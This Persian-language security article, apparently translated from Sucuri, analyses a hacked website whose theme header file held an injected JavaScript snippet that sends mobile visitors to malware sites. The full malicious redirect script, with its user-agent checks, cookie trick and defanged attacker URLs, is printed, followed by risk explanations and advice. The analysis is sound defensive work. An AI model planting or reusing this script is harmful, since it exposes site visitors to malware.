گشت و گذار داخل یک وب سایت از طریق موبایل می تواند خطرناک باشد ، حتی زمانی که شما سایت های کاملا پاک را مشاهده می کنید ، اگر هکرها وب سایتی را در دست گرفته باشند ، یک پاپ آپ آلوده به بد افزار می تواند باعث نتایج خسارت باری در موبایلتان شود.
افزایش گشت و گذارهای اینترنتی از طریق موبایل باعث شده هکرها تکنیک های خود را بیشتر با موبایل ها وفق دهند ، پلتفرم های موبایل را هدف بگیرند و بد افزارها و اسپم ها را برای این دستگاه ها منتشر کنند. فعال بودن شما در زمینه امنیت وب سایتتان کلید ایمن ماندن بازدیدکنندگان سایتتان خواهد بود. فرقی هم نمی کند از طریق کامپیوتر ، لپ تاپ ، تب لت و یا موبایل به سایت شما آمده باشند.
مرورگرهای موبایل از طریق سایت های هک شده ریدایرکت می شوند
هکرها از افزایش بازدیدکنندگان موبایلی سود می برند. به این صورت که ابتدا به آنها پاپ آپ های ناخواسته نشان می دهند و سپس بازدیدکننده با لمس این پاپ آپ ها به سایت های مخرب هدایت می شود. اخیرا یک سایت هک شده را بررسی کردیم که دقیقا همین رفتار را از خود نشان می داد. در طی تحلیل و بررسی متوجه شدیم قطعه کد زیر در فایل headr.php مربوط به قالب سایت گنجانده شده و آن را آلوده کرده است:
<script>
if(document.cookie.indexOf("_mauthtoken")==-1){(function(a,b){if(a.indexOf("ooglebot")==-1){if(/(android|bb\d+|meego).+mobile
|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox
|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|
xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)
|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|
cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|
fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|
tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|emu|jigs|kddi|keji|kgt( |\/)|klon|kpt |
kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)
|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)
|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a
|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|
ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-
|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60
|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){
var tdate = new Date(new Date().getTime() + 1800000); document.cookie = "_mauthtoken=1; path=/;expires="+tdate.toUTCString(); window.location=b;}}}
)(navigator.userAgent||navigator.vendor||window.opera,'hxxp://185(.)93(.)187(.)41/kt/JpNx9n');}
</script>
این کد به طور مشخص دستگاه های موبایل را هدف قرار می دهد و آنها را به یک سری از سایت های مخرب هدایت می کند:
- ابتدا از این آدرس شروع می شود: hxxp://185(.)93(.)187(.)41/kt/JpNx9n
- سپس به برخی از زیر صفحه ها می رود:
hxxp://www(.)bestphoneapps(.)mobi (که شامل بد افزار هستند)
- و در نهایت به این آدرس ختم می شود که آن هم شامل بد افزار است: hxxp://www(.)bestphoneapps(.)mobi
دانلود بد افزارها در کامپیوتر ها و موبایل ها
بسته به نوع مرورگر موبایل و دستگاهی که بازدیدکنندگان سایت شما از آن استفاده می کنند ، قربانیان با صفحه دانلود یک تولبار و یا برنامه موبایل مواجه می شوند. هر دوی این سناریوها آنها را در موقعیت خطرناکی قرار می دهند. اگر قربانیان سهوا بد افزار موبایل را به دستگاهشان اضافه کنند ، می تواند عواقب بدی برای آنها داشته باشد.
برخی از خطرات بد افزارهای موبایل شامل این موارد می شود:
- به هکرها اجازه می دهد به طور دلخواه به اطلاعات دستگاه دسترسی داشته باشند ، آنها را بخوانند و به آنها پاسخ دهند (اطلاعاتی مثل ایمیل ها ، پیامک ها و…)
- می توانند اطلاعات شما را سرغت کنند. اطلاعاتی از قبیل عکس ها و فیلم ها!
- در همه صفحات اینترنتی تبلیغ های ناخواسته نمایش داده می شود.
- از گشت و گذارهای شما در اینترنت اطلاعات حساسی دریافت می کنند.
اگر کاربرانی که از کامپیوتر استفاده می کنند با صفحه های دانلود تولبار که در بالا توضیح داده شد مواجه شوند ، ممکن است در هر کدام از موقعیت های زیر قرار بگیرند:
- نصب ناخواسته بد افزار
- نصب کی لاگرها (Keylogger)
- نصب انواع روت کیت ها و یا اضافه شدن کامپیوتر شما به بات نت ها و استفاده از آن علیه هدف های دیگر
- همچنین هکرها می توانند به طور محرمانه به مرورگر شما و تمامی اطلاعات پشت آن دسترسی پیدا کنند. مثل اطلاعات هر سایتی که شما مدیریت می کنید.
به عنوان یک قاعده کلی بهتر است هر چیزی را که به طور واضح نمی شناسید نصب نکنید ، و اگر خودتان را در صفحه ای پیدا کردید که هیچ ربطی به سایتی که در آن بودید ندارد ، سریعا آن را ترک کنید.
امنیت سایت شما
به عنوان یک مدیر سایت این مسئولیت ماست که مطمئن شویم بازدیدکنندگان ما در بهترین تجربه کاربری ممکن هستند و زمانی که به عناصر سایت ما دسترسی پیدا کنند در خطر نخواهند بود.
اگر در مورد سایت خودتان و یا وب سایتی که از آن بازدید می کنید نگران هستید ، اسکن کردن آن می تواند وضعیت را بیشتر برای شما روشن کند. برای این کار می توانید از اسکنر رایگان شرکت سوکوری (SiteCheck) استفاده کنید. این اسکنر طوری طراحی شده که کاربران مختلفی را که از موبایل استفاده می کنند شبیه سازی می کند و در مورد مشکلات موجود آن سایت که ممکن است روی دستگاه شما تأثیر بگذارد هشدار می دهد.
منبع : sucuri.net